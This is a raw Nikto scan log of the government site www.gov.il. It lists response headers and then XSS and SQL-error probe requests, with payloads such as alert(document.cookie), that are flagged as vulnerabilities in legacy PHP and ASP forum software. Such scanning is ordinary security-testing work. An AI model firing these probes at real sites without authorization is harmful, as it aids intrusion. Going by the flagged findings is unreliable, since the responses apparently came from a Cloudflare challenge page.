nikto_www.gov.il.txt.gz
gunzip -c nikto_www.gov.il.txt.gz
- Nikto v2.1.5/2.1.5
+ Target Host: www.gov.il
+ Target Port: 80
+ GET /: Cookie __cf_bm created without the httponly flag
+ GET /: IP address found in the '__cf_bm' cookie. The IP is "1.0.1.1".
+ GET /: IP address found in the 'set-cookie' header. The IP is "1.0.1.1".
+ GET /: Uncommon header 'cf-ray' found, with contents: 952594134cd90329-MAD
+ GET /: Uncommon header 'cross-origin-resource-policy' found, with contents: same-origin
+ GET /: Uncommon header 'cross-origin-opener-policy' found, with contents: same-origin
+ GET /: Uncommon header 'origin-agent-cluster' found, with contents: ?1
+ GET /: Uncommon header 'permissions-policy' found, with contents: accelerometer=(),autoplay=(),browsing-topics=(),camera=(),clipboard-read=(),clipboard-write=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()
+ GET /: Uncommon header 'server-timing' found, with contents: chlray;desc="952594134cd90329"
+ GET /: Uncommon header 'accept-ch' found, with contents: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
+ GET /: Uncommon header 'x-content-type-options' found, with contents: nosniff
+ GET /: Uncommon header 'x-frame-options' found, with contents: SAMEORIGIN
+ GET /: Uncommon header 'critical-ch' found, with contents: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
+ GET /: Uncommon header 'cf-mitigated' found, with contents: challenge
+ GET /: Uncommon header 'referrer-policy' found, with contents: same-origin
+ GET /: Uncommon header 'cross-origin-embedder-policy' found, with contents: require-corp
+ -9392: GET /userinfo.php?uid=1;: /userinfo.php?uid=1;: Xoops portal gives detailed error messages including SQL syntax and may allow an exploit.
+ -27071: GET /phpimageview.php?pic=javascript:alert(8754): /phpimageview.php?pic=javascript:alert(8754): PHP Image View 1.0 is vulnerable to Cross Site Scripting (XSS). CA-2000-02.
+ -3931: GET /myphpnuke/links.php?op=search&query=[script]alert('Vulnerable);[/script]?query=: /myphpnuke/links.php?op=search&query=[script]alert('Vulnerable);[/script]?query=: myphpnuke is vulnerable to Cross Site Scripting (XSS). CA-2000-02.
+ -3931: GET /myphpnuke/links.php?op=MostPopular&ratenum=[script]alert(document.cookie);[/script]&ratetype=percent: /myphpnuke/links.php?op=MostPopular&ratenum=[script]alert(document.cookie);[/script]&ratetype=percent: myphpnuke is vulnerable to Cross Site Scripting (XSS). CA-2000-02.
+ GET /modules.php?op=modload&name=FAQ&file=index&myfaq=yes&id_cat=1&categories=%3Cimg%20src=javascript:alert(9456);%3E&parent_id=0: /modules.php?op=modload&name=FAQ&file=index&myfaq=yes&id_cat=1&categories=%3Cimg%20src=javascript:alert(9456);%3E&parent_id=0: Post Nuke 0.7.2.3-Phoenix is vulnerable to Cross Site Scripting (XSS). CA-2000-02.
+ GET /modules.php?letter=%22%3E%3Cimg%20src=javascript:alert(document.cookie);%3E&op=modload&name=Members_List&file=index: /modules.php?letter=%22%3E%3Cimg%20src=javascript:alert(document.cookie);%3E&op=modload&name=Members_List&file=index: Post Nuke 0.7.2.3-Phoenix is vulnerable to Cross Site Scripting (XSS). CA-2000-02.
+ -4598: GET /members.asp?SF=%22;}alert(223344);function%20x(){v%20=%22: /members.asp?SF=%22;}alert(223344);function%20x(){v%20=%22: Web Wiz Forums ver. 7.01 and below is vulnerable to Cross Site Scripting (XSS). CA-2000-02.
+ -2946: GET /forum_members.asp?find=%22;}alert(9823);function%20x(){v%20=%22: /forum_members.asp?find=%22;}alert(9823);function%20x(){v%20=%22: Web Wiz Forums ver. 7.01 and below is vulnerable to Cross Site Scripting (XSS). CA-2000-02.